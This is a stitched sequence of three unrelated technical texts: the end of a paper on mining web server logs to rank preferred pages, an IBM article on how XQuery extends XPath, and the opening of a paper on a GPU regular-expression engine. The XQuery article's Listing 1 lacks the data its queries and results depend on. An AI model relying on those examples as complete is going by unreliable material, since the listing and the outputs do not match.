Basic, Perl or Python could have been used for this implementation.
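As a quick illustration of how equations (1) through (4) come together, the short Java fragment below recomputes the numbers from the example in Section 3.5; the class and variable names are ours and are not part of the paper's actual implementation.

```java
public class PreferenceFunctionExample {
    public static void main(String[] args) {
        // Path weights toward page B from the four observed paths (Section 3.5):
        // each unique path contributes 1, each detour that returns to B adds 1/2.
        double[] pathWeightsB = {1.5, 1.0, 1.5, 1.0};

        // Likeness-factor (equation 2): sum of the path weights toward B.
        double lfB = 0.0;
        for (double pw : pathWeightsB) {
            lfB += pw;                                    // LF_B = 5.0
        }

        // Time-factor (equation 3): time spent on B divided by total session time.
        double timeA = 10, timeB = 240, timeC = 600;
        double tfB = timeB / (timeA + timeB + timeC);     // 240 / 850 ≈ 0.282

        // Preference-function (equation 4).
        double pfB = lfB * tfB;                           // ≈ 1.41
        System.out.printf("LF_B=%.1f TF_B=%.3f PF_B=%.2f%n", lfB, tfB, pfB);
    }
}
```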
The Preference-function Algorithm program can be shown as the following pseudo-code:

```
Begin
  Create GUI layout
  Show GUI
  Instantiate class variables
  Wait for action from user
  If "Mine Logs" button pressed {
    Display dialog box to choose file
    Open server log file
    Read log file
    Break up each line into individual components:
      IP address, Date & Time, Command, Web page, Status, Bytes,
      Name, Zone, Type, Reference, Agent
    Create new record with components
    Eliminate all the unnecessary and null items
      (such as .gif, .jpg, .css, .png, .ico, search type, .db)
    Create a session based on unique IP addresses and times
    Store within each session the web pages (states) and clock time
    Create a linked list of each session
    Within each session create the various paths taken by the user
    Determine the time in seconds for each state
    Determine the Likeness-factor by following the paths and
      determining if any states are visited again
    Determine the total time for the session
    Determine the Time-factor for each web page by dividing the time
      by the total time
    Determine the Preference-function for each web page by multiplying
      the Likeness-factor and the Time-factor
    Determine the highest and second-highest Preference-function and its web page
    Append to text area in GUI
  } end if
  If "Web Site File" button pressed {
    Display dialog box to choose file
    Open web-site file
  } end if
  If "Suggested Action" button pressed {
    Read web-site file
    Check to see if each line is equal to the web page with the
      highest or second-highest Preference-function
    If equal then append text area with suggestions
    Close web-site file
  } end if
  If "Exit" button pressed
    Exit program
End
```

5 EXPERIMENTAL PROCEDURE 5.1 Step 1: Server Log Analysis Data preparation is one of the central tasks in web mining (Baglioni et al., 2003). In fact, it usually takes up most of the time of the total analysis process. First, unwanted requests, which are in the form of rows, need to be filtered out. These are usually image files, javascript files and style sheets, to name a few. Next, any unwanted information about the request needs to be filtered out, such as the user identification, request method and query strings. The following are several lines from the server log file used for experimentation: - localhost - - [04/Feb/2004:15:09:36 -0500] "GET /phpdev/ HTTP/1.0" 200 383 - localhost - - [04/Feb/2004:15:09:36 -0500] "GET /phpdev/yak1.htm HTTP/1.0" 200 1048 - localhost - - [04/Feb/2004:15:09:36 -0500] "GET /phpdev/yak2.htm HTTP/1.0" 200 6798 5.2 Step 2: A Recommendation Scenario Ultimately the owner of the web-site has to give guidelines regarding the correlations and importance of web pages. This information is provided by the owner in the action file. Below is a sample action file for the sample web-site created for this project. For example, in the first line the web page name is '/phpdev/' and the action to be taken is 'php books'.

/phpdev/ → php books
/phpdev/yak1.htm → php books
/phpmyadmin/ → php admin books
/AnalogX/ → other web mining sites
/site/ → Apache info
/private/ → Apache info
/start_here.htm → Apache directory information
/phpinfo.php → php books

5.3 An Example of the Preference-function Algorithm A GUI was designed to provide for easy interaction between the program and the user. There are four actions that a user can take, as shown in Figure 3. Figure 3: Four Actions When the "Mine Logs" button is pressed, a dialog box appears for the user to choose which server log file to open. Once the file has been opened, the results of the mining are shown.
Next, a web-site action file has to be selected. This is done by pressing the “Web Site File” button. When this button is pressed, a dialog box appears to select the file to use for web-site actions. In order to get the suggested actions for the user preferred web-pages, the “Suggested Actions” button is pressed. 6 CONCLUSIONS When planning web applications, information about the users’ preferences makes designing web pages more relevant and useful. Being able to adapt web pages provides the flexibility needed in the ever-changing world of likes and dislikes. This paper implements a novel approach defined as the Preference-function Algorithm (PFA) for web-site adaptation. The algorithm extracts future preferences from users’ past web navigational data. Server web logs are used as navigational information to formulate the Preference-function. Using states to model each web page, all sessions are modeled as a finite state graph and the traverses among the various states are determined to be the path of a particular user. The viability of the Preference-function Algorithm is shown with a user-created web-site and the automatic creation of the server logs. The Preference-function is determined using the Likeness and Time-factors. The highest and second highest pages are determined to be the most preferred web pages by the unique users. REFERENCES
{"Source-Url": "http://www.scitepress.org/Papers/2005/25215/25215.pdf", "len_cl100k_base": 4884, "olmocr-version": "0.1.51", "pdf-total-pages": 7, "total-fallback-pages": 0, "total-input-tokens": 24094, "total-output-tokens": 5869, "length": "2e12", "weborganizer": {"__label__adult": 0.0003001689910888672, "__label__art_design": 0.0005106925964355469, "__label__crime_law": 0.00034046173095703125, "__label__education_jobs": 0.001708984375, "__label__entertainment": 0.00011301040649414062, "__label__fashion_beauty": 0.00014388561248779297, "__label__finance_business": 0.0005249977111816406, "__label__food_dining": 0.00029659271240234375, "__label__games": 0.000545501708984375, "__label__hardware": 0.00118255615234375, "__label__health": 0.0005564689636230469, "__label__history": 0.00035834312438964844, "__label__home_hobbies": 0.00013005733489990234, "__label__industrial": 0.0004208087921142578, "__label__literature": 0.0003712177276611328, "__label__politics": 0.00021970272064208984, "__label__religion": 0.00037288665771484375, "__label__science_tech": 0.14794921875, "__label__social_life": 0.00014388561248779297, "__label__software": 0.043548583984375, "__label__software_dev": 0.79931640625, "__label__sports_fitness": 0.0002310276031494141, "__label__transportation": 0.0003523826599121094, "__label__travel": 0.00022041797637939453}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 23419, 0.03711]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 23419, 0.77458]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 23419, 0.90418]], "google_gemma-3-12b-it_contains_pii": [[0, 3438, false], [3438, 8546, null], [8546, 12225, null], [12225, 15765, null], [15765, 17227, null], [17227, 20427, null], [20427, 23419, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3438, true], [3438, 8546, null], [8546, 12225, null], [12225, 15765, null], [15765, 17227, null], [17227, 20427, null], [20427, 23419, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 23419, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 23419, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 23419, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 23419, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 23419, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 23419, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 23419, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 23419, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 23419, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 23419, null]], "pdf_page_numbers": [[0, 3438, 1], [3438, 8546, 2], [8546, 12225, 3], [12225, 15765, 4], [15765, 17227, 5], [17227, 20427, 6], [20427, 23419, 7]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 23419, 0.0]]}
olmocr_science_pdfs
2024-12-03
2024-12-03
106cde485091ad084e631ed3ff6c281e4e4e66ad
How XQuery extends XPath
Things you can do in XQuery but not XPath
Donnie Cameron
April 01, 2008

XPath and XQuery are similar in some ways. XPath is even an integral part of XQuery. Both languages allow you to select bits of data from an XML document or an XML document store. In this article, you'll find descriptions of XPath and XQuery, and learn how XQuery extends XPath. Although both XPath and XQuery perform some of the same functions, XPath provides simplicity and XQuery provides additional power and flexibility. XPath is the perfect tool for many types of queries. For example, XPath is the easiest way for you to create an unordered list of phone numbers from a subset of records in an XML document. However, if you need a query that expresses more complex record-selection criteria, transforms the result set, or requires recursion, then you need XQuery. **XPath** XPath is a domain-specific language (DSL) that is quickly becoming an important part of other more general-purpose languages. Programming languages are incorporating XPath through modules and classes, and in some cases directly into the languages' syntax. This is similar to what happened with regular expressions some time ago. XPath is popular because of the considerable amount of time and effort that the language can save a developer when extracting specific bits of data from an XML document. Even individuals who have never dealt with XPath before can quickly harness its power. Consider the XML fragment in Listing 1. **Listing 1. XML Document** ```xml <users> <user> <name> <first>Lola</first> <last>Solis</last> </name> </user> </users> ``` If you want to obtain a list of last names of the children in this document, you can use the following XPath expression. **Listing 2. Selecting the last names of the users that are under 18 years old** ```xml //user[age lt 18]/name/last/text() ``` (: Result Solis Serafina :) Imagine the code that you'd have to write to extract that data without XPath. Even with the help of regular expressions, you'd need to think a little about how to exclude the value from the last tag that's in the visits node. The above XPath expression is not only concise, but also quite clear. A quick glance reveals what the expression does, even to people that don't know XPath. XPath works because it is powerful and because it has a long history behind it. The language understands the nodes in an XML document of arbitrary complexity and, more importantly, the relationships among those nodes. So you can write concise expressions that consider not only elements and element values, but also attributes, processing instructions, and so on. Many XML queries are hard to express in a clearer and more concise manner than with XPath. But the DSL nature of XPath and the language's goals impose some fairly serious limitations on the programmer. The sections that follow describe the XQuery language briefly and show problems that XPath alone cannot solve. These problems require the programmer to move beyond XPath to a tool like XQuery. **XQuery** Because XQuery supports XPath natively, as part of XQuery's syntax, XQuery clearly can do everything that XPath can do. But XQuery is Turing-complete and can be considered a general-purpose language; it easily overcomes many of the limitations of XPath, at the expense of introducing a little complexity. **Overview** XQuery uses a simple syntax that is a mix of XML, XPath, comments, functions, and a special expression syntax to tie it all together.
XQuery code consists entirely of expressions with no statements. All values are sequences and simplicity is important to the language. So both of the expressions `"Hi"` and `2*2` are valid XQuery code that will execute without any prelude or modification. XQuery is a high-level, strongly typed, functional language (free of side effects) that is ideal for expressing a query to obtain data both from an XML document and from a large XML document repository. In this last respect, it is much like SQL. But XQuery additionally provides for expressing an arbitrary transformation of the result set. Much like the use of XPath can be rewarding when you want to retrieve some data from an XML document, the use of XQuery can be quite rewarding when you want to retrieve and transform data from a large repository of XML documents. **Transforming the result set** One obvious limitation of XPath is that it doesn't provide for transforming the result set in any way. Suppose you wanted to return the results from the earlier XPath query (Listing 2) in alphabetical order, as shown in Listing 3.

**Listing 3. Results in alphabetical order**
Serafina
Solis

You can't do this with XPath. To achieve this, you'd have to write code in another language (like XQuery, for example) or use some special, proprietary XPath extension to sort the results. XQuery, on the other hand, allows you to sort the results or transform them into HTML, CSV, SQL, or any other text-based format. Among the most powerful types of transformations that you can do with XQuery are XML-to-XML transformations. Often, large XML databases can contain a large variety of complex, interrelated XML documents that a client application doesn't need. XQuery allows a client to describe precisely the type of XML document that it would like the server to return. By providing an XQuery interface, a server can often avoid keeping data in multiple schemas. Moreover, using XQuery to transform the data for a client is usually far easier and faster than attempting to transform the data with Perl or Java or some other popular computer language. Certainly, transforming data with XQuery when you retrieve the data is much faster in current implementations than performing a transformation later with XSLT. For tying together record-selection criteria and result-transformation instructions, XQuery provides a feature called a FLWOR (pronounced "flower") expression. The letters in the acronym stand for `for`, `let`, `where`, `order by`, and `return`. These are the elements that can make up a FLWOR expression. FLWOR expressions include at least some of those elements in roughly the order that the acronym suggests. All FLWOR expressions start with a `for` or a `let` expression and end with a `return` expression. If you're familiar with SQL, you might already see where I am headed with this. Here's a simple FLWOR expression, which borrows from Edwin Markham's poem, "Outwitted" (see Listing 4). **Listing 4. Simple FLWOR expression** ```xml let $xml:= <a> <one>She drew a circle that shut me out</one> <two>Heretic rebel, a thing to flout</two> </a> return $xml//one/text() (: Result "She drew a circle that shut me out" :) ``` Listing 5 shows how you can apply a simple FLWOR expression to the XML in Listing 1. (For brevity, the listing shows the text _XML from Listing 1_ in place of the actual XML that belongs there.) **Listing 5.
**Listing 5. Simple FLWOR expression**

```xml
let $xml := _XML from Listing 1_
for $user in $xml//user[age lt 18]
order by $user/name/last
return $user/name/last/text()

(: Result
Serafina
Solis
:)
```

If you wanted the query to return an HTML fragment representing the result as a numbered list, you can apply the XQuery from Listing 6.

**Listing 6. Simple FLWOR expression that outputs a numbered list in HTML**

```xml
let $xml := _XML from Listing 1_
return
  <ol>{
    for $user in $xml//user[age lt 18]
    order by $user/name/last
    return <li>{$user/name/last/text()}</li>
  }</ol>

(: Result
<ol><li>Serafina</li><li>Solis</li></ol>
:)
```

Notice how XML and XQuery mix so intuitively and effectively in Listing 6.

**Expressing more complex record-selection criteria**

Aside from transforming the data that it retrieves, XQuery is also a lot better than XPath at finding data in the first place. XQuery and XPath often provide redundancy, which can help programmers be more expressive with queries. For example, Listing 7 shows how you can move the XPath expression fragment `age lt 18` into a `where` clause in the FLWOR expression.

**Listing 7. Expressing XPath constraints in XQuery**

```
let $xml := _XML from Listing 1_
return
  <ol>{
    for $user in $xml//user
    where $user/age lt 18
    order by $user/name/last
    return <li>{$user/name/last/text()}</li>
  }</ol>
```

The result that the expression in Listing 7 produces is exactly the same as the result of the expression in Listing 6. But XQuery's `where` clause is significantly more flexible than the XPath syntax for expressing constraints. The XQuery `where` clause can consist of nested expressions of arbitrary complexity that can even include function calls. XQuery doesn't impose limitations on record-selection expressions.

**Using functions and recursion**

While XPath doesn't allow you to define functions of your own, XQuery provides a substantial collection of built-in functions and operators and also allows users to define functions of their own. XQuery functions are strongly typed, support recursion, and can be declared as internal or external. An internal function is a standard function where the function body follows the function declaration. An external function is a type of function declaration that opens the door for implementations to allow the user to define the body of the function in a different programming language.

While recursion might not be the best approach for the tasks that many developers undertake day to day, it often comes in handy when you work with XML, which can contain arbitrarily nested nodes. Consider the `transform-names` function defined in Listing 8.

**Listing 8. Simple function to change node names in any XML document**

```
(: Part 1 :)
define function transform-names($node as node()) as node()
{
  element {replace(name($node), "_", "-")}
  {
    $node/text(),
    for $subnode in $node/*
    return transform-names($subnode)
  }
}

(: Part 2 :)
let $xml :=
  <item>
    <item_type>book</item_type>
    <contributors>
      <author>
        <first_name>Charles</first_name>
        <last_name>Edward</last_name>
        <home_address>
          <home_street>206 S. Solomon St.</home_street>
          <home_city>New Orleans</home_city>
          <home_state>LA</home_state>
          <home_zip>70119</home_zip>
        </home_address>
      </author>
      <artist>
        <last_name>Salinas</last_name>
      </artist>
    </contributors>
  </item>
return transform-names($xml)

(: Result
<item>
  <item-type>book</item-type>
  <contributors>
    <author>
      <first-name>Charles</first-name>
      <last-name>Edward</last-name>
      <home-address>
        <home-street>206 S. Solomon St.</home-street>
        <home-city>New Orleans</home-city>
        <home-state>LA</home-state>
        <home-zip>70119</home-zip>
      </home-address>
    </author>
    <artist>
      <last-name>Salinas</last-name>
    </artist>
  </contributors>
</item>
:)
```

The transform-names function, which amounts merely to the code that appears in Part 1 of Listing 8, accepts an XML document or node of arbitrary complexity. In every XML tag name, the function replaces any underscore character (_) with a dash character (-). Recursion in this case makes it trivial for the function to traverse the structure of the document. As a result, the function is succinct (just a few lines!), easy to maintain, and works with any valid XML document or node that doesn't use attributes. Even if the function seems a little difficult to grasp completely at first (especially for programmers who don't often resort to recursion), one might quickly guess how to modify the function to delete underscores instead of replacing them with dashes.

**Expressing joins**

XPath doesn't provide a means to join XML nodes in a query. However, just like SQL provides a natural syntax to express table-joins in queries, XQuery provides an intuitive (at least to SQL users) way to join sets of XML nodes. The code in Listing 9 describes how joins work in XQuery.

**Listing 9. XQuery join expression**

(: Part 1 :)
let $authors :=
  <authors>
    <author>
      <name>Harold Abelson</name>
      <books>
        <isbn>978-0-07-000422-1</isbn>
        <isbn>978-0-262-01063-4</isbn>
      </books>
    </author>
    <author>
      <name>Paul Graham</name>
      <books>
        <isbn>978-0-13-370875-2</isbn>
        <isbn>978-0-13-030552-7</isbn>
        <isbn>978-0-596-00662-4</isbn>
      </books>
    </author>
    <author>
      <name>Apostolos-Paul Refenes</name>
      <books>
        <isbn>978-0-471-94364-8</isbn>
        <isbn>978-981-02-2819-4</isbn>
      </books>
    </author>
  </authors>

(: Part 2 :)
let $books :=
  <books>
    <book>
      <title>Structure and Interpretation of Computer Programs</title>
      <isbn>978-0-07-000422-1</isbn>
    </book>
    <book>
      <title>Turtle Geometry</title>
      <isbn>978-0-262-01063-4</isbn>
    </book>
    <book>
      <title>ANSI Common LISP</title>
      <isbn>978-0-13-370875-2</isbn>
    </book>
    <book>
      <title>On LISP</title>
      <isbn>978-0-13-030552-7</isbn>
    </book>
    <book>
      <title>Hackers and Painters</title>
      <isbn>978-0-596-00662-4</isbn>
    </book>
    <book>
      <title>Neural Networks in the Capital Markets</title>
      <isbn>978-0-471-94364-8</isbn>
    </book>
    <book>
      <title>Neural Networks in Financial Engineering</title>
      <isbn>978-981-02-2819-4</isbn>
    </book>
    <book>
      <title>Handbook of Artificial Intelligence</title>
      <isbn>978-0-201-16889-1</isbn>
    </book>
    <book>
      <title>Artificial Intelligence Programming</title>
      <isbn>978-0-89859-609-0</isbn>
    </book>
    <book>
      <title>A New Guide to Artificial Intelligence</title>
      <isbn>978-0-89391-607-7</isbn>
    </book>
    <book>
      <title>Artificial Intelligence</title>
      <isbn>978-0-08-034112-5</isbn>
    </book>
    <book>
      <title>Artificial Intelligence</title>
      <isbn>978-0-631-18385-3</isbn>
    </book>
  </books>

(: Part 3 :)
return
  <books-complete-info>{
    for $book in $books/*
    for $author in $authors/*
    where $book/isbn = $author/books/isbn
    order by $book/title
    return <book>{$book/*, $author/name}</book>
  }</books-complete-info>

Parts 1 and 2 of Listing 9 assign XML documents to the variables authors and books. Some of the nodes in books relate to nodes in authors, such that a book node has an ISBN that is among the ones listed for an author node. Part 3 of the listing contains an XQuery join expression that assembles a new XML document, books-complete-info (look ahead in Listing 10), that contains book nodes that include the author's name.
Note a few remarkable things about the code in Part 3 of Listing 9. The two for expressions near the beginning of that code hint to XQuery that this will be a join expression. The where clause is similar conceptually to what one might write in SQL to achieve the join. But notice that an author node can have multiple ISBNs, which requires that the where clause effectively mean: "where the book's ISBN is among the author's ISBNs". This compares more to a sub-select within an SQL where clause, but the XQuery syntax seems more intuitive and natural. And certainly the XQuery expression is more concise. Listing 10. Results from an XQuery join expression <books-complete-info> <book> <title>ANSI Common LISP</title> <isbn>978-0-13-370875-2</isbn> <name>Paul Graham</name> </book> <book> <title>On LISP</title> <isbn>978-0-13-030552-7</isbn> <name>Paul Graham</name> </book> <book> <title>Neural Networks in the Capital Markets</title> <isbn>978-0-471-94364-8</isbn> <name>Apostolos-Paul Refenes</name> </book> <book> <title>Neural Networks in Financial Engineering</title> <isbn>978-981-02-2819-4</isbn> <name>Apostolos-Paul Refenes</name> </book> </books-complete-info> Summary XPath is a mature DSL that should be your first choice to get to a piece of data that is buried deep in an XML document or repository. But, XPath was not designed to handle many kinds of problems. As you saw in this article, XQuery extends XPath vastly, emerging as the tool of choice when you have complex data selection requirements or you need to return results that are sorted, specially formatted, or otherwise transformed. Related topics - **W3C Recommendation for XQuery 1.0 Specification**: Read the details on this query language designed to be broadly applicable across many types of XML data sources. - **W3C Recommendation for XQuery 1.0 and XPath 2.0 Functions and Operators**: Explore this catalog of the functions and operators required for XPath 2.0, XML Query 1.0 and XSLT 2.0. - **W3C XML Query Use Cases**: Look at usage scenarios for XQuery. - **What is XQuery** (Per Bothner. O'Reilly xml.com, October 2002): Read this high level view of XQuery that introduces main ideas that you should understand before you go deeper or actually try to use it. - **Process XML using XQuery** (Nicholas Chase, developerWorks, March 2007): In the tutorial, see how to use XQuery to retrieve information from an XML document stored in an XQuery-enabled database. - **An Introduction to XQuery** (Howard Katz, developerWorks, January 2006): Get some background history, a road map into the documentation, and a snapshot of the current state of the XQuery specification. - **XML Schema Part 2: Datatypes Second Edition**: Peruse the specification for the XML Schema language as it defines facilities for defining datatypes to be used in XML Schemas as well as other XML specifications. - **XPath Recommendation**: Read more on XPath, a language for addressing parts of an XML document that is designed for use by both XSLT and XPointer. - **XML Path Language (XPath) 2.0**: See where XPath is going. - **Turing test**: Read about a proposal for a test of a machine’s capability to demonstrate intelligence, on Wikipedia. - **Find out how you can become an IBM-Certified Developer.** - **XML technical library**: See the developerWorks XML Zone for a wide range of technical articles and tips, tutorials, standards, and IBM Redbooks. - **DB2 Express-C 9.5**: Download and try the XML database used for this tutorial. 
- **IBM trial software**: Build your next development project with trial software available for download directly from developerWorks.
{"Source-Url": "https://www.ibm.com/developerworks/library/x-xqueryxpath/x-xqueryxpath-pdf.pdf", "len_cl100k_base": 4511, "olmocr-version": "0.1.49", "pdf-total-pages": 9, "total-fallback-pages": 0, "total-input-tokens": 19390, "total-output-tokens": 5289, "length": "2e12", "weborganizer": {"__label__adult": 0.00026035308837890625, "__label__art_design": 0.0001862049102783203, "__label__crime_law": 0.0001876354217529297, "__label__education_jobs": 0.00021708011627197263, "__label__entertainment": 4.595518112182617e-05, "__label__fashion_beauty": 7.957220077514648e-05, "__label__finance_business": 0.00010079145431518556, "__label__food_dining": 0.0002312660217285156, "__label__games": 0.00021326541900634768, "__label__hardware": 0.00039124488830566406, "__label__health": 0.00018775463104248047, "__label__history": 0.00011408329010009766, "__label__home_hobbies": 4.410743713378906e-05, "__label__industrial": 0.00016427040100097656, "__label__literature": 0.0001462697982788086, "__label__politics": 9.5367431640625e-05, "__label__religion": 0.0002715587615966797, "__label__science_tech": 0.0028057098388671875, "__label__social_life": 6.502866744995117e-05, "__label__software": 0.01230621337890625, "__label__software_dev": 0.9814453125, "__label__sports_fitness": 0.00014472007751464844, "__label__transportation": 0.00016808509826660156, "__label__travel": 0.0001327991485595703}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 18536, 0.03668]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 18536, 0.32504]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 18536, 0.82576]], "google_gemma-3-12b-it_contains_pii": [[0, 1679, false], [1679, 3299, null], [3299, 6521, null], [6521, 8217, null], [8217, 10514, null], [10514, 12596, null], [12596, 14221, null], [14221, 16512, null], [16512, 18536, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1679, true], [1679, 3299, null], [3299, 6521, null], [6521, 8217, null], [8217, 10514, null], [10514, 12596, null], [12596, 14221, null], [14221, 16512, null], [16512, 18536, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 18536, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 18536, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 18536, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 18536, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 18536, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 18536, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 18536, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 18536, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 18536, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 18536, null]], "pdf_page_numbers": [[0, 1679, 1], [1679, 3299, 2], [3299, 6521, 3], [6521, 8217, 4], [8217, 10514, 5], [10514, 12596, 6], [12596, 14221, 7], [14221, 16512, 8], [16512, 18536, 9]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 18536, 0.01045]]}
olmocr_science_pdfs
2024-11-27
2024-11-27
47e3420910dd847890e12874a500febb3a58d6e0
ABSTRACT This paper presents iNFAnt, a parallel engine for regular expression pattern matching. In contrast with traditional approaches, iNFAnt adopts non-deterministic automata, allowing the compilation of very large and complex rule sets that are otherwise hard to treat. iNFAnt is explicitly designed and developed to run on graphical processing units that provide large amounts of concurrent threads; this parallelism is exploited to handle the non-determinism of the model and to process multiple packets at once, thus achieving high performance levels. Categories and Subject Descriptors C.2.3 [Computer-Communication Networks]: Network Operations General Terms Experimentation, Algorithms Keywords NFA, pattern matching, CUDA, GPGPU, regular expression 1. INTRODUCTION Pattern matching, i.e. the task of matching a string of symbols against a set of given patterns, plays an important role in multiple fields that range from bioinformatics (e.g. for analyzing DNA sequences) to high-speed packet processing, where it is a critical component for packet filtering, traffic classification and, in general, deep packet inspection. Pattern matching is commonly performed by expressing patterns as sets of regular expressions and converting them into finite state automata (FSAs), mathematical models that represent (potentially infinite) sets of strings. The behavior of FSAs is simple to emulate on computing devices in order to perform the actual matching procedure and finite automata can be easily composed together with the full set of boolean operators. Two kinds of FSAs are known from the literature, deterministic (DFA) and non-deterministic (NFA). While automata theory proves them equivalent in terms of expressiveness, their practical properties are different: NFA traversal requires, by definition, non-deterministic choices that are hard to emulate on actual, deterministic processors; on the other hand DFAs, while fast to execute, can be less space-efficient, requiring very large amounts of memory to store certain peculiar patterns that are rather common in practice (the so-called state space explosion) [2]. In general, software-based NFA implementations suffer from a higher per-byte traversal cost when compared with DFAs: intuitively, this is because multiple NFA states can be active at any given step, while only a single one must be considered when processing DFAs. So far software research has been focused mainly on DFAs, as they provide a relatively easy way to achieve high throughputs; many efforts have been aimed at solving the inherent downsides of this model and avoid the aforementioned memory explosion. At the same time, NFAs have often been relegated to the design of hardware devices (e.g. FPGAs) that can easily mimic their behavior, or for use where high throughput is not the primary concern (e.g. many general-purpose pattern-matching libraries). This paper presents iNFAnt, a NFA-based regular expression engine running on graphical processing units (GPUs). iNFAnt represents a significant departure from traditional software-based pattern matching engines both for its underlying automaton model, the NFA, and its target hardware platform, the GPU. NFA adoption allows iNFAnt to efficiently store very large regular expression sets in a limited amount of memory while the parallelism offered by the underlying hardware helps countering the higher per-byte traversal cost of NFAs with respect to DFAs and the higher instruction execution time of GPUs with respect to CPUs. 
iNFAnt also represents, as far as we know, one of the first approaches to pattern matching designed from the ground up for the heavily parallel execution environment offered by modern programmable GPUs, as opposed to being an adaptation of a technique originally designed for general-purpose processors. 2. RELATED WORK It is common knowledge that pattern matching is the most time-consuming operation to be performed in intrusion detection systems and similar applications: accelerating its execution has been the object of several academic works. Some of them have already considered the idea of using the parallelism offered by GPUs. It is possible either to try to execute the whole packet processing application on a graphical device or to accelerate only the pattern matching portion. The first case saw the development of Gnort [7], a full port of the Snort IDS^1 to a GPU environment. ^1 Available at http://www.snort.org/. Gnort did not initially support regular expressions, delegating them to the host CPU; it has since been extended with a DFA-based regex engine [8]. DFA approaches, however, incur state space explosion, typically solved by heuristically splitting the rules into smaller subsets or (as Gnort does) translating only a "well-behaved" subset while keeping the rest in NFA form for host processing [8]. Both solutions are suboptimal for our goals, as splitting leads to inefficiencies (all the DFAs must be traversed) while resorting to host processing defeats the goal of graphical hardware adoption. Other, more advanced approaches for countering the DFA state explosion problem have been proposed, such as HFAs [1], which split the DFA under construction at the point where state space explosion would happen. There have been some attempts at porting advanced techniques, such as XFAs [5], to GPUs; however, adapting a traversal algorithm designed for CPUs to a GPU-based device is not straightforward or efficient because of deep architectural differences. Other techniques described in the literature use GPUs to perform preprocessing steps or, alternatively, employ inexact algorithms to perform matching (e.g. [6]). These approaches are out of scope for the purpose of this paper, which aims at a full-fledged regex engine. Perhaps the work most closely related to iNFAnt is reported in [4] and describes methods to run DFAs and NFAs on a high-speed single-instruction, multiple-data (SIMD) processor. While NFAs are recognized as a viable technique on parallel hardware and for reducing memory consumption, the proposed algorithm implements only a subset of the regular expression operators; moreover, it considers an architecture radically different from GPUs in terms of specifications and programming model. 3. CUDA ARCHITECTURE The latest trends have seen a shift towards the development of inexpensive, highly parallel and programmable GPUs. Employing these processors in fields unrelated to computer graphics has been dubbed general-purpose computation on graphical processing units, or GPGPU. There are multiple kinds of programmable GPUs available on the market, and only recently has a standard programming interface, OpenCL^2, begun to emerge. For the purpose of this work, we have used nVidia devices that implement and expose the Compute Unified Device Architecture^3 (CUDA) programming interface.
3.1 Execution cores CUDA devices are logically composed of arrays of single-instruction, multiple-thread (SIMT) processors, the multiprocessors, each one containing a number of physical execution cores (typically 8). The devices support thousands of threads at the same time, multiplexed on their far smaller set of cores by a dedicated hardware scheduler that avoids the overhead usually associated with context switching. The instruction set is RISC and most instructions require multiple clock cycles for their execution: efficiency comes from the large number of cores, not their individual performance, which is low. In the SIMT paradigm each multiprocessor executes the same instruction simultaneously for multiple threads by assigning a different execution context to each core; when this is not possible (e.g. due to the different outcomes of a conditional branch) threads are said to diverge and the execution of groups of threads that go along different code paths is sequentialized by the scheduler. CUDA GPUs reduce the amount of branching (and thus divergence) with predicated execution, i.e., the writeback phase of most instructions can be conditionally disabled by fencing them with a predicate register: if false, the instruction is still executed but does not modify the state of the processor. Conditional execution is automatically introduced by the compiler as a replacement for small, potentially divergent code sequences, e.g. in simple if-then-else constructs. 3.2 Memory hierarchy CUDA devices provide a varied hierarchy of memory areas with different sizes and access times; it is the programmer's responsibility to choose the appropriate usage for each one, also considering access patterns and the fact that no caching is implicitly performed by the hardware. In addition to a number of 32-bit registers shared by all the threads, each multiprocessor carries an on-chip shared memory. Although slower than registers, shared memory is still fast: its latency can be measured in tens of clock cycles; it is, however, small: our board carries 16 KB of shared memory per multiprocessor. Shared memory is also banked; multiple accesses to independent banks are carried out simultaneously but conflicts force serialization. Bulk storage is provided by global memory, ranging from hundreds of megabytes up to more than a gigabyte (depending on the card model). The on-board (though not on-chip) global memory is connected to each multiprocessor with a high-bandwidth bus, providing more than 80 Gb/s on our test card. The downside is that every access incurs a very high latency cost, estimated around 400-600 processor 